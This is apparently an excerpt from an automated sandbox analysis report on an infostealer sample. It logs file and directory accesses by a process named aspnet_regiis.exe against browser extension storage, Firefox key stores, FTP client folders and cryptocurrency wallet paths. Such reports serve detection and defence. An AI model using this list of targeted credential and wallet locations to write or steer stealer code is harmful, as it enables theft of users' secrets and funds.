Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
